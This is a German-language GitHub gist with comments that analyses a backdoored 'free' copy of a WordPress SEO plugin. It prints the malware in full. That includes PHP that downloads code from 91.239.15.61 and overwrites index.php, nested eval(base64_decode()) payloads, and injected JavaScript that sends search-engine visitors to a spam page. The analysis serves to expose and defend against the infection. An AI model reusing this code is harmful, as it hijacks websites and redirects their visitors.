Create a gist now

Instantly share code, notes, and snippets.

@ocean90 /o1.txt Secret
Last active Dec 29, 2015

What would you like to do?
Analyse des Skriptes zu einem angeblich kostenlosen Premiumplugin. http://blog.wpde.org/?p=2322
<?php
// Aus aioseop_class.php
// $X
/* ------------------------------------------------------------------
Author: Abdul Rahman Sherzad (www.afghancybersoft.com)
Email: info@afghancybersoft.com
Biography: Abdul Rahman Sherzad was born and brought up in Herat-Afghanistan and completed my under-graduate studies
in Computer Science Faculty of Herat University in 2006 obtaining my B.C.S degree as the best outgoing senior student
from this faculty. Having intellectuality in Computer Programming and Information Database Management System, I was offered
to commence teaching in Computer Science Faculty of Herat University. After a while I joined CRS to work as the Database
Manager for the ADA program. I worked for CRS for a couple of years after which I was awarded a scholarship by the
government of Germany to pursue my Master in Information Database Management and Software Engineering in Berlin at
TU-Berlin University. I am currently also teaching at the Herat University as well as acting as the head of Information
Systems Manager both in CRS and Herat University to support the educational needs.
--------------------------------------------------------------------- */
// Erste Zeile
$curl = curl_init('http://91.239.15.61/info.php');
curl_setopt($curl, CURLOPT_FAILONERROR, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
// Zweite Zeile
$code_txt = 'http://91.239.15.61/o1.txt';
$path = getenv("DOCUMENT_ROOT").'';
if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){
$code= file_get_contents($code_txt);
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
}
}else{
echo 'Not a wordpress Installation';
}
// http://91.239.15.61/o1.txt
/**
* Fehlende Anführungszeichen.
* Ansonten mehrfach eval(base64_decode(....)):
*
* string(1279) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0RmVEVlBSR2hSVFRCS2Rsa3dSWGRUTUU1WVlrY3hURkl4YjNoWmJURlBUVWRHV0U5WVZsbE5iRmt3V1Zab1QwMUhUalZhTWpWYVRURmFOVmxyV1RWalIwcDBZa1JDUzJWWGRIZFNSa1oyVTIxV00wMUZkRVJWVjNSeVdrWm9TMk13YkVWTlIyUktZbGRuZDFwRmFFSk9hM2cxVDBSV1RsVjZValZVV0hCeVpGVXhWVlpZVms5aGExWXlXVmN4UjAxc2JGUlBWelZwVFdwc2RWbHJaRlprVjA1SVlVaGtTbUZ1VG01U1JrWjJVMnRPVkZWdGNHaFJNRVUxVTFWa1QwMVhUblJsUjFwb1ZucFdkMXBGVG01alJUazFVVmRrUlZWWE9VdFJNVTVUVFVkR1dFMVhlR2xOTVZsM1UxVlJkMW93TlZWak1tUktVVlJDVEZFeFJuTmhiVkpaVTI1T1dVMHdOWE5hUldNMVpESlNSRm95ZEZwTmJXUjZWVlJHVjFVeFVrWlBWa1pYVW1wc1YxWlhkRE5qTUhCSlZtNXNhVkV5Y3pOVFZVVjNVekJPVW1KSGNHdFhSWEI2VjBST1QySkhVa2hQV0dSclVUSmtjbGRVU201ak1VVjRWbXhPVlZKVWJGSldhMWsxVlRGS1YxVnNXbFpoZWxaV1ZsZDBSMVF4VlhkWGExcFdZVmhrTkZNeFVucGFNRkpTWWpCd1JGWXdOSGhaTWpFMFdtMU5lVlpxUW1sTk1FbDNVekJPVTJGdFJrUmxSVkpYVm10d1RsWkVSa05X.Vm1kM1ZHeENWV0Y2VmtkVlZFWlRWbFpPVmsxVldsVk5WbHBXVkVWT1UwMUhSbGhOVjNocFRURlpkMU14VW5wYU1GSlNZakJ3UkZVeFNuSlhWbWhUWVVWc1JVMUhaRnBOTVZvMVdXdFpOV0pIVmtoV2JYQk1VVEZLY1ZsVlRuSk9NR3hFVVZVMVJGb3lkRXRYVkU1WFpWZEtSMDlYY0dsU2VtdzJWMnhPYm1FeGEzbGFNMEpRWlZWR1QxRXlaSEpUYkhCWVZHMDVhV1ZWUm5CVGEyUlRZVWRTU0ZKWGJGQmtla0pNVVRGbmQxUnJUbkJQU0ZwUi5aV3BTVDFFeVkzQkxWSE1wS1RzKSk7));"
* string(942) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRXdTME5YYkcxTFIxb3hZbTFPTUdGWE9YVllNbFkwWVZoT01HTjVaMjVaTTFaNVlrWTVjR0p0YkRCS2VXdHdSRkZ2U21WM01FdERVV3RyWkZoS2MwbEVNR2RKYldnd1pFaEJOa3g1T0RWTlV6UjVUWHByZFUxVVZYVk9ha1YyWVcxR01sbFRPVzVpTWpsdVlrZFZkV05IYUhkSmFuTm5SRkZ2U2tOVFVtcGhRMEU1U1VkT01XTnRlR1poVnpWd1pFTm5jRTk1UVdkRVVXOUtRMU5TTUdGWE1XeGlNMVl3U1VRd1owNVVjMmRKUVRCTFExRnNhbVJZU25OWU0wNXNaRWM1ZDJSRFoydFpNbWR6VVRGV1UxUkZPVkZXUmpsV1ZXdDNjMHBJVm5saVEyczNTVUV3UzBOUmJHcGtXRXB6V0ROT2JHUkhPWGRrUTJkcldUSm5jMUV4VmxOVVJUbFJWa1k1VTFKV1VsWlZhelZWVld0R1QxVXdXa1pWYVhkNFMxUnpaMFJSYjBwRFYwNHhZMjE0Wm1NeVZqQmlNMEl3UzBOU2FtRkRlRVJXVmtwTlZERkNWVmd3VGxCVWF6VkdVVEZTVlZOVk1VWlVNVlpWVEVOU01HRlhNV3hpTTFZd1MxUnpaMFJSYjBwRFUxSnJXVmhTYUVsRU1HZFpNMVo1WWtZNWJHVkhWbXBMUTFKcVlVTnJOMGxEUVU1RFoydEtXVE5XZVdKR09XcGlSemw2V2xObmExa3laM0JQZVVGT1EyZHJTbHBYVG05aWVVRnBTa2RTYUdSSFJXbFBkekJMUTFnd1RrTnBPSFpR.ZWpST1EyY3BLVHMpKTs));"
* string(689) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKEx5ODhQM0JvY0EwS0NXbG1LR1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25ZM1Z5YkY5cGJtbDBKeWtwRFFvSmV3MEtDUWtrZFhKc0lEMGdJbWgwZEhBNkx5ODVNUzR5TXprdU1UVXVOakV2YW1GMllTOW5iMjluYkdVdWNHaHdJanNnRFFvSkNTUmphQ0E5SUdOMWNteGZhVzVwZENncE95QWdEUW9KQ1NSMGFXMWxiM1YwSUQwZ05Uc2dJQTBLQ1FsamRYSnNYM05sZEc5d2RDZ2tZMmdzUTFWU1RFOVFWRjlWVWt3c0pIVnliQ2s3SUEwS0NRbGpkWEpzWDNObGRHOXdkQ2drWTJnc1ExVlNURTlRVkY5U1JWUlZVazVVVWtGT1UwWkZVaXd4S1RzZ0RRb0pDV04xY214ZmMyVjBiM0IwS0NSamFDeERWVkpNVDFCVVgwTlBUazVGUTFSVVNVMUZUMVZVTENSMGFXMWxiM1YwS1RzZ0RRb0pDU1JrWVhSaElEMGdZM1Z5YkY5bGVHVmpLQ1JqYUNrN0lDQU5DZ2tKWTNWeWJGOWpiRzl6WlNna1kyZ3BPeUFOQ2drSlpXTm9ieUFpSkdSaGRHRWlPdzBLQ1gwTkNpOHZQejROQ2cpKTs));"
* string(500) "eval(base64_decode(Ly88P3BocA0KCWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpDQoJew0KCQkkdXJsID0gImh0dHA6Ly85MS4yMzkuMTUuNjEvamF2YS9nb29nbGUucGhwIjsgDQoJCSRjaCA9IGN1cmxfaW5pdCgpOyAgDQoJCSR0aW1lb3V0ID0gNTsgIA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJHVybCk7IA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsgDQoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCR0aW1lb3V0KTsgDQoJCSRkYXRhID0gY3VybF9leGVjKCRjaCk7ICANCgkJY3VybF9jbG9zZSgkY2gpOyANCgkJZWNobyAiJGRhdGEiOw0KCX0NCi8vPz4NCg));"
* =>
*/
//<?php
if(function_exists('curl_init'))
{
$url = "http://91.239.15.61/java/google.php";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
//?>
<?php ob_start(); ?>
<? eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTV0dSVVRVVTFXVmxyWTNoVVJrbDRZak5vV21KVVJsQlVWV1JIVjBVNVdWWnNiRTVpUm10M1YxWmFiMVF3TVVoVWFsWmhUV3BXWVZSVVJtRk9WbXh5VjFSV2FsSXdjREJaYTFKRFV6SldXR1JJWkZOU2Exb3lWVEl4VjAwd01VWmtSVkpXVmpOU2VWZHJXbTlUTWsxM1lrVldUbEl5VWt0WmJHUnVaREZ3Um1GRlNrOWhNMmN4VkRCU1YxUnNWalpWYWxaVlYwaENlVnBHVlhoV1ZscFpWbXM1YUdFeFdYbFhWbU40VWpBeGMySkdVbEJXZWxad1ZGZHdjMlJXYkhKYVJscHJWakExU1ZsVmFHdFRiVVoxVkcwMVUxSnJXakpWTW5SUFZrWldkR05IYUZKTlJWVXhWVEZXYTFRd01WaFVibEpzVWpGd2IxWnVjRmRrTVhCR1ZHMDFhbEpVYXpGVlZtUnJVbFpXV0U5VmRGSk5WVFZVVkZWa1IxZEZNVmhsUjJ4T1RWWnNNMVV4VmxKa01XOTNUbFpXYWsxdFVrdFZWbEpEVkVaRmVGSnVUbWhpVmtwYVZUSTFUMWRWTUhkT1dFNWhVbGROTVZwRVNsTlNSbTk1WkVad1RtSlhValpXVmxKSFZqRlZlRlZyV2xCV2ExcFlWVzF3YzFZeFdsaGtSRTVxVFVoQ1NsWnROWE5o.VmtWNVkzcE9WRlpWVmpOVmVrSlBWVzFLU0dOSGRGaFNXRUkyVmpCU1QxUXlTa2hWYTJoUVYwZFNjbFZVU210amJHUlZVMjAxYWsxVlZqUldiWGhQVmxaS1ZXSkdTbGRoTVdzeFZsUkdTMVl4Vm5OWGJGcG9aV3hhVjFac1pEQlNNVkY0Vmxoa1dHRXhjRmRaVm1oclRrWk5lRlZ1Y0dGTlJrcFRXV3BDZDFKR1dYZE9TR2hhVFdwRk1GZHRNVTVsVmxweFVXMXNUazFGYkROVmVrSlBWVEpHZEZKclVteFNWa3BZVm0xMGQxUnNXa1ZTYTA1WC5WbTFrTTFaSGVFTldWMFkyVm10a1ZsWkZXbFJXYkZwUFZtc3hWbGRzVms1V2JIQlhWa1ZXVDFVd01VaFNiR2hPVmpOb2NGUlVSbHBrTVUxNFZXNXdZVTFHU2xOWmFrSjNVa1pWZUZOdVNsaFdiV2hVV1ZWV2MxSlZNVWhhUm5CT1RWWnZNVmRYZEZwT1YwcElWbXRvVjJKWVFrMVZWRVpMWTFac1ZsUnVTazlOUjNoRlZWWlZNVkpHYjNsa1JYUllWa1UxV0ZwV1pFdFNNRGxZWTBkc1UyVnRkekpXTW5oUFltMUZlR0V6YkdGTk1FcFJXbFpXUjFReFJYbGFTRXBVWWtoQ1dWWkhNRFZoVjFaV1VtNUNWR0V5VWxSWlZXUlRVMFpLV0dKR1FtdGxhMHBOVlZSR2JtUXhVbkpVYmtKUVUwWndVaTVhVjNCVFZERkZlVmt6UWt4V1NFMXdTMVJ6S1NrNykpOw)); ?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

dasllama commented Dec 1, 2013

Das steht in der google.php:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
     var head=document.getElementsByTagName('head')[0]
      var script=document.createElement('script')
       script.setAttribute('type', 'text/javascript')
       script.setAttribute('src', "http://91.239.15.61/google.js")
       head.appendChild(script)
}
}

function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++)
{
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

window.onload = function()
{
redirect();
createCookie('doRedirect','true','999');
}
//-->
</script>
</head>

<body>
</body>
</html>

dasllama commented Dec 1, 2013

Und das in der google.js

    var from = document.referrer;
    var i;
    var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
    for (i = 0; i < se.length; ++i) {
        if (from.indexOf(se[i]) + 1) {
            if (!checkCookie()) {
                window.location = "http://91.239.15.61/g.php";
            }
        }
    }

    function getCookie(c_name) {
        var c_value = document.cookie;
        var c_start = c_value.indexOf(" " + c_name + "=");
        if (c_start == -1) {
            c_start = c_value.indexOf(c_name + "=");
        }
        if (c_start == -1) {
            c_value = null;
        }
        else {
            c_start = c_value.indexOf("=", c_start) + 1;
            var c_end = c_value.indexOf(";", c_start);
            if (c_end == -1) {
                c_end = c_value.length;
            }
            c_value = unescape(c_value.substring(c_start, c_end));
        }
        return c_value;
    }

    function setCookie(c_name, value, exdays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }

    function checkCookie() {
        var referrerRedirectCookie = getCookie("referrerRedirectCookie");
        if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
            return true;
        }
        else {
            setCookie("referrerRedirectCookie", "do not redirect", 730);
            return false;
        }
    }

Die http://91.239.15.61/g.php sollte nicht aufgerufen werden. Das ist Porn-Spam.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment